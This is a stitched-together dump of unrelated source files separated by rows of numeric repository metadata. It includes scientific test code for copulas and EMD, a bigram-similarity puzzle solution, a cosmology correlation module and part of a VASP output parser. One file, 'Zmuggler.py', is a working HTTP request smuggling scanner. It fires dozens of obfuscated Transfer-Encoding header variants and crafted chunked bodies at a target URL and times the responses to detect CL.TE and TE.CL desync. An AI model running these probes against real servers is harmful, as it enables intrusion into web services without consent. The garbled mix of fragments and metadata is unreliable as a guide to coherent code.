print(DVine.c(valuedict))
def test_with_multinormal_3_dim(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 0.1, 0.3], [0.1, 2, 0], [0.3, 0, 3]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
valuedict = {"solar": 0, "wind": 0, "tide": 0}
lowerdict = {"solar": -3, "wind": -2.3, "tide": -0.9}
upperdict = {"solar": 1, "wind": 1.4, "tide": 2.7}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_with_multinormal_4_dim(self):
dimkeys = ["solar", "wind", "tide","geo"]
dimension = len(dimkeys)
ourmean = [0, 0, 0, 0]
ourcov = [[1, 0.1, 0.3,0.4], [0.1, 2, 0,0], [0.3, 0, 3,0],[0.4,0,0,4]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2]),
"geo":UnivariateNormalDistribution(var=ourcov[3][3], mean=ourmean[3])}
valuedict = {"solar": 0, "wind": 0, "tide": 0,"geo":0}
lowerdict = {"solar": -1, "wind": -1, "tide": -1,"geo":-2}
upperdict = {"solar": 1, "wind": 1, "tide": 1,"geo":2}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'gaussian-copula','gaussian-copula'],
[None, None, 'gaussian-copula','gaussian-copula'],
[None, None, None,'gaussian-copula'],
[None,None,None,None]]
with Timer('MultiNormal'):
multigaussian = MultiNormalDistribution(dimkeys, input_data=data_dict)
print(multigaussian.rect_prob(lowerdict, upperdict))
cvine = CVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('CVine rect_prob calculus'):
print(cvine.rect_prob(lowerdict, upperdict))
dvine = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
with Timer('DVine rect_prob calculus'):
print(dvine.rect_prob(lowerdict, upperdict))
def test_plot(self):
dimkeys = ["solar", "wind", "tide"]
dimension = len(dimkeys)
ourmean = [0, 0, 0]
ourcov = [[1, 1.3, 1.2], [1.3, 2, 0], [1.2, 0, 1.5]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1]),
"tide": UnivariateNormalDistribution(var=ourcov[2][2], mean=ourmean[2])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 10000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
pair_copulae_strings = [[None, 'gaussian-copula', 'frank-copula'],
[None, None, 'gaussian-copula'],
[None, None, None]]
valuedict = {"solar": 1, "wind": 1, "tide": 0.73}
lowerdict = {"solar": -3, "wind": -2, "tide": 0}
upperdict = {"solar": 0.5, "wind": 1, "tide": 1}
mydistr = DVineCopula(dimkeys, data_dict, marginals, pair_copulae_strings)
n = 20 #number of points to display
U = mydistr.generates_U(n=n)
d = 3
diago = diag(d)
P =[]
fig = plt.figure()
center = 0.5*np.ones(d)
k = 2 #index of the diagonal where you want to project
ax = fig.add_subplot(111, projection='3d')
ax.scatter(U[:, 0], U[:, 1], U[:, 2], c='g', marker='o')
for i in range(n):
P = diago.proj(U[i],k)
ax.scatter(P[0,0],P[0,1],P[0,2], c='r', marker='o')
ax.plot([U[i,0], P[0,0]],[U[i,1], P[0,1]],[U[i,2], P[0,2]], c='k')
diagonal = diago.list_of_diag[k]
ax.plot([diagonal[0][0],diagonal[1][0]], [diagonal[0][1],diagonal[1][1]],[diagonal[0][2],diagonal[1][2]], c='b')
ax.set_xlabel(dimkeys[0])
ax.set_ylabel(dimkeys[1])
ax.set_zlabel(dimkeys[2])
plt.show()
class RankHistogramTester(unittest.TestCase):
def test_normal_distribution(self):
mu = 0
sigma = 1
m = 10000
mydistr = UnivariateNormalDistribution(0, 1)
rank_data = mu + sigma * np.random.randn(10000)
rank = RankHistogram(mydistr, rank_data, 25)
rank.plot()
def test_gaussian_copula(self):
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.5
rho2 = 0.5
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
rank_data = multigaussian2.generates_U(10000)
diag(2).rank_histogram(rank_data, 20, multigaussian1)
class EMDTester(unittest.TestCase):
def test_different_comparison(self):
"""
This test compare the different comparison we can imagine between a empirical distribution and the uniform distribution
The EMD to the uniform distribution is difficult to compute so we represent the uniform distribution by a vector :
Either by generating a random sample on [0,1] : Y
Or with regular interval of length 1/n on [0,1] : Z
Or with regular smaller regular intervals of length 1/m in [0,1] ; A
:return: print the histograms of the emd found for each vector when we compute 1000 of this 3 EMD
"""
n = 10000
m = 100
H = np.zeros((1000, 3))
Z = np.asarray(range(n)) / n
A = np.zeros(n)
for i in range(m):
for j in range(int(n / m)):
A[i * n / m + j] = i / m
for k in range(1000):
X = np.random.rand(n)
Y = np.random.rand(n)
H[k][0] = emd_sort(U=X, V=Y)
H[k][1] = emd_sort(U=X, V=Z)
H[k][2]= emd_sort(U=X, V=A)
print(k)
count, bins, ignored = plt.hist(H, normed='True', label='Y', color='brk')
# EMD between X and Y will be in blue
# EMD between X and Z will be in red
# EMD between X and A will be in black
plt.legend(loc='upper right')
plt.plot(bins, np.ones_like(bins), linewidth=2, color='b')
plt.show()
def test_pyomo_with_sort(self):
n = 100
p=1
normal1 = np.random.randn(n)
normal2 = np.random.randn(n)
uniform1 = np.random.rand(n)
uniform2 = np.random.rand(n)
linearprog = np.asarray(range(n)) / n
U = linearprog
V = normal1
iter = []
for i in range(n):
for j in range(n):
iter.append((i, j))
print('Unsorted')
print('EMD sort')
tic()
print(emd_sort(U, V,p))
toc()
print('EMD pyomo')
tic()
print(emd_pyomo(U, V,p)[0])
toc()
print(' ')
print('EMD sort')
tic()
print(emd_sort(np.sort(U), np.sort(V),p))
toc()
print("sorted")
print('EMD pyomo')
tic()
print(emd_pyomo(np.sort(U),np.sort(V),p)[0])
toc()
def test_gaussian_copula(self):
#not finished yet
print("Warning test not finished yet")
n = 10000
dimkeys = ["solar", "wind"]
dimension = len(dimkeys)
ourmean = [2, 3]
ourmeandict = {"solar": 0, "wind": 0}
rho =0.1
rho2 = 0.9
ourcov = [[1, rho], [rho, 1]]
ourcov2 = [[1, rho2], [rho2, 1]]
marginals = {"solar": UnivariateNormalDistribution(var=ourcov[0][0], mean=ourmean[0]),
"wind": UnivariateNormalDistribution(var=ourcov[1][1], mean=ourmean[1])}
data_array = np.random.multivariate_normal(ourmean, ourcov, 100000)
data_array2 = np.random.multivariate_normal(ourmean, ourcov2, 100000)
data_dict = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict[dimkeys[i]] = data_array[:, i]
data_dict2 = dict.fromkeys(dimkeys)
for i in range(dimension):
data_dict2[dimkeys[i]] = data_array2[:, i]
multigaussian1 = GaussianCopula(input_data=data_dict, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
multigaussian2 = GaussianCopula(input_data=data_dict2, dimkeys=dimkeys, marginals=marginals, quadstep=0.001)
print(emd_sort(data_array,data_array))
print(emd_sort(data_array2, data_array))
print(emd_sort(data_array2, data_array2))
#self.assertGreater(g, m)
#self.assertGreater(m, s)
if __name__ == '__main__':
i=0
for distr in ['empirical-copula']:
CopulaTester().test_plot(distr)
i=+1
print(i)
| 43.644366
| 134
| 0.61584
| 4,520
| 37,185
| 4.91792
| 0.100885
| 0.019794
| 0.056593
| 0.010887
| 0.693643
| 0.627649
| 0.572405
| 0.52364
| 0.468262
| 0.437402
| 0
| 0.041509
| 0.25236
| 37,185
| 851
| 135
| 43.695652
| 0.758066
| 0.064004
| 0
| 0.479514
| 0
| 0
| 0.05282
| 0
| 0
| 0
| 0
| 0
| 0.08346
| 1
| 0.069803
| false
| 0
| 0.025797
| 0.007587
| 0.124431
| 0.051593
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa32fa26545cc0a0f75090c1a789058c3f6ac3d
| 751
|
py
|
Python
|
src/level2/뉴스클러스터링.py
|
iml1111/programmers_coding_study
|
07e89220c59c3b40dd92edc39d1b573d018efae4
|
[
"MIT"
] | 1
|
2021-01-03T13:01:33.000Z
|
2021-01-03T13:01:33.000Z
|
src/level2/뉴스클러스터링.py
|
iml1111/programmers_coding_study
|
07e89220c59c3b40dd92edc39d1b573d018efae4
|
[
"MIT"
] | null | null | null |
src/level2/뉴스클러스터링.py
|
iml1111/programmers_coding_study
|
07e89220c59c3b40dd92edc39d1b573d018efae4
|
[
"MIT"
] | null | null | null |
from collections import Counter
def refine(s):
result = []
for i in range(len(s) - 1):
bigram = s[i:i+2].lower()
if bigram.isalpha():
result.append(bigram)
return result
def solution(str1, str2):
counter1, counter2 = Counter(refine(str1)), Counter(refine(str2))
set1, set2 = set([i for i in counter1]), set([i for i in counter2])
a_point = sum([min(counter1[idx], counter2[idx]) for idx in set1 & set2])
b_point = sum([max(counter1[idx], counter2[idx]) for idx in set1 | set2])
if a_point == b_point:
return 65536
else:
return int(a_point / b_point * 65536)
if __name__ == '__main__':
#print(solution("FRANCE", "french"))
print(solution("E=M*C^2", "e=m*c^2"))
| 31.291667
| 77
| 0.609854
| 113
| 751
| 3.929204
| 0.415929
| 0.027027
| 0.040541
| 0.036036
| 0.216216
| 0.171171
| 0.171171
| 0.171171
| 0.171171
| 0
| 0
| 0.055652
| 0.234354
| 751
| 24
| 78
| 31.291667
| 0.716522
| 0.046605
| 0
| 0
| 0
| 0
| 0.030726
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.052632
| 0
| 0.315789
| 0.052632
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5faad04658ea51684534a077173c5f03481fc86f
| 6,728
|
py
|
Python
|
Zmuggler.py
|
electronicbots/Zmuggler
|
5b9df5919367dffb588b18c5acd567e20135d2b7
|
[
"MIT"
] | 1
|
2021-07-28T06:02:44.000Z
|
2021-07-28T06:02:44.000Z
|
Zmuggler.py
|
electronicbots/Zmuggler
|
5b9df5919367dffb588b18c5acd567e20135d2b7
|
[
"MIT"
] | null | null | null |
Zmuggler.py
|
electronicbots/Zmuggler
|
5b9df5919367dffb588b18c5acd567e20135d2b7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
from requests import Request, Session
from requests.exceptions import ReadTimeout
import urllib3, requests, collections, http.client, optparse, sys, os
print("""\033[1;36m
_____ _
|__ /_ __ ___ _ _ __ _ __ _| | ___ _ __
/ /| '_ ` _ \| | | |/ _` |/ _` | |/ _ \ '__|
/ /_| | | | | | |_| | (_| | (_| | | __/ |
/____|_| |_| |_|\__,_|\__, |\__, |_|\___|_|
|___/ |___/
| Zmuggler |
| @electronicbots |
\033[1;m""")
http.client._header_name = lambda x: True
http.client._header_value = lambda x: False
urllib3.disable_warnings()
class ZSmuggler():
def __init__(self, url):
self.url = url
self.pheaders = []
self.rheaders = []
def genHeaders(self):
transfer_encoding = list(
[
["Transfer-Encoding", "chunked"],
["Transfer-Encoding ", "chunked"],
["Transfer_Encoding", "chunked"],
["Transfer Encoding", "chunked"],
[" Transfer-Encoding", "chunked"],
["Transfer-Encoding", " chunked"],
["Transfer-Encoding", "chunked"],
["Transfer-Encoding", "\tchunked"],
["Transfer-Encoding", "\u000Bchunked"],
["Content-Encoding", " chunked"],
["Transfer-Encoding", "\n chunked"],
["Transfer-Encoding\n ", " chunked"],
["Transfer-Encoding", " \"chunked\""],
["Transfer-Encoding", " 'chunked'"],
["Transfer-Encoding", " \n\u000Bchunked"],
["Transfer-Encoding", " \n\tchunked"],
["Transfer-Encoding", " chunked, cow"],
["Transfer-Encoding", " cow, "],
["Transfer-Encoding", " chunked\r\nTransfer-encoding: cow"],
["Transfer-Encoding", " chunk"],
["Transfer-Encoding", " cHuNkeD"],
["TrAnSFer-EnCODinG", " cHuNkeD"],
["Transfer-Encoding", " CHUNKED"],
["TRANSFER-ENCODING", " CHUNKED"],
["Transfer-Encoding", " chunked\r"],
["Transfer-Encoding", " chunked\t"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer-Encoding", " cow\r\nTransfer-Encoding: chunked"],
["Transfer\r-Encoding", " chunked"],
["barn\n\nTransfer-Encoding", " chunked"],
])
for x in transfer_encoding:
headers = collections.OrderedDict()
headers[x[0]] = x[1]
headers['Cache-Control'] = "no-cache"
headers['Content-Type'] = "application/x-www-form-urlencoded"
headers['User-Agent'] = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)"
self.pheaders.append(headers)
def resptime(self, headers={}, payload=""):
s = Session()
req = Request('POST', self.url, data=payload)
prepped = req.prepare()
prepped.headers = headers
resp_time = 0
try:
resp = s.send(prepped, verify=False, timeout=10)
resp_time = resp.elapsed.total_seconds()
except Exception as e:
if isinstance(e, ReadTimeout):
resp_time = 10
return resp_time
def calcT(self, L_Bigtime, P_Bigtime, L_Smalltime, P_Smalltime):
for headers in self.pheaders:
headers['Content-Length'] = L_Bigtime
big_time = self.resptime(headers, P_Bigtime)
if not big_time:
big_time = 0
if big_time < 5:
continue
headers['Content-Length'] = L_Smalltime
small_time = self.resptime(headers, P_Smalltime)
if not small_time:
small_time = 1
if big_time > 5 and big_time / small_time >= 5:
self.valid = True
self.type = "CL-TE"
self.rheaders = [headers]
return True
return False
def Bcheck(self):
header = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
try:
resp = requests.get(self.url, headers=header, verify=False, timeout=10)
if resp.status_code == 200:
return True
else:
return False
except Exception as error:
print(error)
def checkCLTE(self):
result = self.calcT(4, "1\r\nA\r\nS\r\n\r\n\r\n", 11, "1\r\nA\r\nS\r\n\r\n\r\n")
return result
def checkTECL(self):
result = self.calcT(6, "0\r\n\r\nX", 5, "0\r\n\r\n")
return result
def expl0it(self):
if self.Bcheck():
self.genHeaders()
try:
result = self.checkCLTE()
flag = "CLTE"
if not result:
result = self.checkTECL()
flag = "TECL"
if result:
print("\033[1;31m" + "\033[1;m\033[1;32m[+] Found possible " + flag)
self.recheck(flag)
except Exception as e:
print(e)
print("timeout: " + self.url)
else:
print('\033[1;31m' + "[-] can't access target" + '\033[1;m')
def recheck(self, flag):
print("[+] Checking again...")
result = False
if flag == "CLTE":
result = self.checkCLTE()
if flag == "TECL":
result = self.checkTECL()
if result:
payloadkey = list(self.rheaders[0])[0]
payloadV = self.rheaders[0][payloadkey]
payload = str([payloadkey, payloadV])
print(flag, payload)
def Main():
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.filepath)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
def Args():
Parser = optparse.OptionParser()
group = optparse.OptionGroup(Parser, "Grouped arguments")
group.add_option('--target' , dest='link', help = 'target URL')
Parser.add_option_group(group)
(arguments, values) = Parser.parse_args()
return arguments
if __name__ == '__main__':
arguments = Args()
if '--target' in str(sys.argv):
target = (arguments.link)
hrs = ZSmuggler(target)
hrs.expl0it()
else:
print("Try ./Zmuggler.py --help")
| 35.597884
| 148
| 0.5
| 658
| 6,728
| 4.93617
| 0.287234
| 0.142857
| 0.120382
| 0.143165
| 0.267857
| 0.239224
| 0.239224
| 0.213978
| 0.184421
| 0.163177
| 0
| 0.026651
| 0.35865
| 6,728
| 188
| 149
| 35.787234
| 0.726072
| 0.002527
| 0
| 0.233129
| 0
| 0.042945
| 0.284501
| 0.030402
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067485
| false
| 0
| 0.018405
| 0
| 0.141104
| 0.06135
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5faed7df0481d882b8814038712e8be58ef77e17
| 3,397
|
py
|
Python
|
cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py
|
ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra
|
07e5d308c6a8641a369a3e0b8d13c4104988cd2b
|
[
"BSD-2-Clause"
] | 1
|
2021-09-15T10:10:26.000Z
|
2021-09-15T10:10:26.000Z
|
cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py
|
ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra
|
07e5d308c6a8641a369a3e0b8d13c4104988cd2b
|
[
"BSD-2-Clause"
] | null | null | null |
cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py
|
ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra
|
07e5d308c6a8641a369a3e0b8d13c4104988cd2b
|
[
"BSD-2-Clause"
] | 1
|
2021-06-11T15:29:43.000Z
|
2021-06-11T15:29:43.000Z
|
#coding: utf-8
#import cl_to_xi_full
from __future__ import print_function
from builtins import range
import numpy as np
from cosmosis.datablock import option_section, names as section_names
from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp
from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
def setup(options):
if options.has_value(option_section, "theta"):
theta = options[option_section, 'theta']
if np.isscalar(theta):
theta = np.array([theta])
theta = arcmin_to_radians(theta)
else:
n_theta = options[option_section, "n_theta"]
theta_min = options[option_section, "theta_min"]
theta_max = options[option_section, "theta_max"]
theta_min = arcmin_to_radians(theta_min)
theta_max = arcmin_to_radians(theta_max)
theta = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta)
corr_type = options.get_int(option_section, 'corr_type')
ell_max = options.get_int(option_section, "ell_max")
cl_section = options.get_string(option_section, "input_section_name", "")
output_section = options.get_string(
option_section, "output_section_name", "")
# setup precompute functions and I/O sections
if corr_type == 0:
precomp_func = precomp_GpGm
cl_to_xi_func = save_xi_22
if not cl_section:
cl_section = "shear_cl"
if not output_section:
output_section = "shear_xi"
elif corr_type == 1:
precomp_func = get_legfactors_00
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_cl"
if not output_section:
output_section = "galaxy_xi"
elif corr_type == 2:
precomp_func = get_legfactors_02
cl_to_xi_func = save_xi_00_02
if not cl_section:
cl_section = "galaxy_shear_cl"
if not output_section:
output_section = "galaxy_shear_xi"
else:
print("corr_type should be 0 (for spin 2 autocorrelations e.g. xi+/-(theta)),")
print("1 (for scalar autocorrelations e.g. w(theta) or 2")
print("for spin 0 x spin 2 correlations e.g. gamma_t(theta)")
raise ValueError()
legfacs = precomp_func(np.arange(ell_max + 1), theta)
return theta, ell_max, legfacs, cl_to_xi_func, cl_section, output_section
def execute(block, config):
thetas, ell_max, legfacs, cl_to_xi_func, cl_section, output_section = config
n_theta = len(thetas)
ell = block[cl_section, "ell"]
nbina, nbinb = block[cl_section, 'nbin_a'], block[cl_section, 'nbin_b']
block[output_section, "nbin_a"] = nbina
block[output_section, "nbin_b"] = nbinb
block[output_section, "theta"] = thetas
#block.put_metadata(output_section, "theta", "unit", "radians")
for i in range(1, nbina + 1):
for j in range(1, nbinb + 1):
name = 'bin_%d_%d' % (i, j)
if block.has_value(cl_section, name):
c_ell = block[cl_section, name]
else:
continue
cl_interp = SpectrumInterp(ell, c_ell)
cl_to_xi_func(block, output_section, i, j,
cl_interp, thetas, legfacs)
return 0
def cleanup(config):
# nothing to do here! We just include this
# for completeness. The joy of python.
return 0
| 36.138298
| 87
| 0.657345
| 480
| 3,397
| 4.325
| 0.25625
| 0.093931
| 0.023121
| 0.028902
| 0.22736
| 0.202312
| 0.148844
| 0.148844
| 0.090559
| 0.090559
| 0
| 0.017689
| 0.251104
| 3,397
| 93
| 88
| 36.526882
| 0.798349
| 0.064469
| 0
| 0.178082
| 0
| 0
| 0.114754
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.082192
| 0.013699
| 0.164384
| 0.054795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fb11bba5257814c53fdaf00b36feffb7caef7ad
| 22,329
|
py
|
Python
|
aiida_vasp/parsers/content_parsers/vasprun.py
|
DropD/aiida_vasp
|
9967f5501a6fc1c67981154068135cec7be5396a
|
[
"MIT"
] | 3
|
2016-11-18T07:19:57.000Z
|
2016-11-28T08:28:38.000Z
|
aiida_vasp/parsers/content_parsers/vasprun.py
|
DropD/aiida_vasp
|
9967f5501a6fc1c67981154068135cec7be5396a
|
[
"MIT"
] | null | null | null |
aiida_vasp/parsers/content_parsers/vasprun.py
|
DropD/aiida_vasp
|
9967f5501a6fc1c67981154068135cec7be5396a
|
[
"MIT"
] | null | null | null |
"""
The vasprun.xml parser interface.
---------------------------------
Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content.
"""
# pylint: disable=abstract-method, too-many-public-methods
import numpy as np
from parsevasp.vasprun import Xml
from parsevasp import constants as parsevaspct
from aiida_vasp.parsers.content_parsers.base import BaseFileParser
from aiida_vasp.utils.compare_bands import get_band_properties
class VasprunParser(BaseFileParser):
"""The parser interface that enables parsing of ``vasprun.xml`` content.
The parser is triggered by using the keys listed in ``PARSABLE_QUANTITIES``.
"""
OPEN_MODE = 'rb'
DEFAULT_SETTINGS = {
'quantities_to_parse': [
'structure',
'eigenvalues',
'dos',
'kpoints',
'occupancies',
'trajectory',
'energies',
'projectors',
'dielectrics',
'born_charges',
'hessian',
'dynmat',
'forces',
'stress',
'total_energies',
'maximum_force',
'maximum_stress',
'band_properties',
'version',
],
'energy_type': ['energy_extrapolated'],
'electronic_step_energies': False
}
PARSABLE_QUANTITIES = {
'structure': {
'inputs': [],
'name': 'structure',
'prerequisites': [],
'alternatives': ['poscar-structure']
},
'eigenvalues': {
'inputs': [],
'name': 'eigenvalues',
'prerequisites': [],
'alternatives': ['eigenval-eigenvalues']
},
'dos': {
'inputs': [],
'name': 'dos',
'prerequisites': [],
'alternatives': ['doscar-dos']
},
'kpoints': {
'inputs': [],
'name': 'kpoints',
'prerequisites': [],
'alternatives': ['kpoints-kpoints']
},
'occupancies': {
'inputs': [],
'name': 'occupancies',
'prerequisites': [],
},
'trajectory': {
'inputs': [],
'name': 'trajectory',
'prerequisites': [],
},
'energies': {
'inputs': [],
'name': 'energies',
'prerequisites': [],
},
'total_energies': {
'inputs': [],
'name': 'total_energies',
'prerequisites': [],
},
'projectors': {
'inputs': [],
'name': 'projectors',
'prerequisites': [],
},
'dielectrics': {
'inputs': [],
'name': 'dielectrics',
'prerequisites': [],
},
'stress': {
'inputs': [],
'name': 'stress',
'prerequisites': [],
},
'forces': {
'inputs': [],
'name': 'forces',
'prerequisites': [],
},
'born_charges': {
'inputs': [],
'name': 'born_charges',
'prerequisites': [],
},
'hessian': {
'inputs': [],
'name': 'hessian',
'prerequisites': [],
},
'dynmat': {
'inputs': [],
'name': 'dynmat',
'prerequisites': [],
},
'fermi_level': {
'inputs': [],
'name': 'fermi_level',
'prerequisites': [],
},
'maximum_force': {
'inputs': [],
'name': 'maximum_force',
'prerequisites': []
},
'maximum_stress': {
'inputs': [],
'name': 'maximum_stress',
'prerequisites': []
},
'band_properties': {
'inputs': [],
'name': 'band_properties',
'prerequisites': [],
},
'version': {
'inputs': [],
'name': 'version',
'prerequisites': [],
}
}
# Mapping of the energy names to those returned by parsevasp.vasprunl.Xml
ENERGY_MAPPING = {
'energy_extrapolated': 'energy_extrapolated_final',
'energy_free': 'energy_free_final',
'energy_no_entropy': 'energy_no_entropy_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
ENERGY_MAPPING_VASP5 = {
'energy_extrapolated': 'energy_no_entropy_final',
'energy_free': 'energy_free_final',
# Not that energy_extrapolated_final parsed is the entropy term
'energy_no_entropy': 'energy_extrapolated_final',
'energy_extrapolated_electronic': 'energy_extrapolated',
'energy_free_electronic': 'energy_free',
'energy_no_entropy_electronic': 'energy_no_entropy',
}
def _init_from_handler(self, handler):
"""Initialize using a file like handler."""
try:
self._content_parser = Xml(file_handler=handler, k_before_band=True, logger=self._logger)
except SystemExit:
self._logger.warning('Parsevasp exited abnormally.')
@property
def version(self):
"""Fetch the VASP version from ``parsevasp`` and return it as a string object."""
# fetch version
version = self._content_parser.get_version()
if version is None:
return None
return version
@property
def eigenvalues(self):
"""Fetch eigenvalues."""
# Fetch eigenvalues
eigenvalues = self._content_parser.get_eigenvalues()
if eigenvalues is None:
return None
return eigenvalues
@property
def occupancies(self):
"""Fetch occupancies."""
# Fetch occupancies
occupancies = self._content_parser.get_occupancies()
if occupancies is None:
# occupancies not present, should not really happen?
return None
return occupancies
@property
def kpoints(self):
"""Fetch the kpoints an prepare for consumption by the NodeComposer."""
kpts = self._content_parser.get_kpoints()
kptsw = self._content_parser.get_kpointsw()
# k-points in XML is always in reciprocal if spacing methods have been used
# but what about explicit/regular
cartesian = False
kpoints_data = None
if (kpts is not None) and (kptsw is not None):
# Create a dictionary and store k-points that can be consumed by the NodeComposer
kpoints_data = {}
kpoints_data['mode'] = 'explicit'
kpoints_data['cartesian'] = cartesian
kpoints_data['points'] = kpts
kpoints_data['weights'] = kptsw
return kpoints_data
@property
def structure(self):
"""
Fetch a given structure.
Which structure to fetch is controlled by inputs.
eFL: Need to clean this so that we can set different
structures to pull from the outside. Could be usefull not
pulling the whole trajectory.
Currently defaults to the last structure.
"""
return self.last_structure
@property
def last_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step.
"""
last_lattice = self._content_parser.get_lattice('last')
if last_lattice is None:
return None
return _build_structure(last_lattice)
@property
def final_structure(self):
"""
Fetch the structure.
After or at the last recorded ionic step. Should in
principle be the same as the method above.
"""
return self.last_structure
@property
def last_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
force = self._content_parser.get_forces('last')
return force
@property
def final_forces(self):
"""
Fetch forces.
After or at the last recorded ionic step.
"""
return self.last_forces
@property
def forces(self):
"""
Fetch forces.
This container should contain all relevant forces.
Currently, it only contains the final forces, which can be obtain
by the id `final_forces`.
"""
final_forces = self.final_forces
forces = {'final': final_forces}
return forces
@property
def maximum_force(self):
"""Fetch the maximum force of at the last ionic run."""
forces = self.final_forces
if forces is None:
return None
norm = np.linalg.norm(forces, axis=1)
return np.amax(np.abs(norm))
@property
def last_stress(self):
"""
Fetch stess.
After or at the last recorded ionic step.
"""
stress = self._content_parser.get_stress('last')
return stress
@property
def final_stress(self):
"""
Fetch stress.
After or at the last recorded ionic step.
"""
return self.last_stress
@property
def stress(self):
"""
Fetch stress.
This container should contain all relevant stress.
Currently, it only contains the final stress, which can be obtain
by the id `final_stress`.
"""
final_stress = self.final_stress
stress = {'final': final_stress}
return stress
@property
